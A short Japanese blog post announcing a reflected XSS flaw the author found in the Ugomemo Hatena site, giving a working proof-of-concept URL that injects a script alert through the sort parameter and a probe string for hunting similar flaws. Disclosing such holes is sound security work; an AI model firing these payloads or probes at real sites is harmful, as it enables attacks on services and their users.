読者です 読者をやめる 読者になる 読者になる

素人がプログラミングを勉強していたブログ

プログラミング、セキュリティ、英語、Webなどのブログ since 2008

連絡先: すかいぷ:javascripter_  か javascripter あっと tsukkun.net skypeのほうがいいです

うごメモはてなのXSS

javascript

うごメモはてな - みんなの作品
はてなのXSS脆弱性を発見したのでメモ。

http://ugomemo.hatena.ne.jp/movies?sort="><script>alert("XSS")</script>

XSSは、クエリの値に

xxx>\"'%0A

と入れて、Firefoxのソース表示でxxxで検索して壊れてる部分を探すとすぐ見つかる。
参考文献:
適当なブログ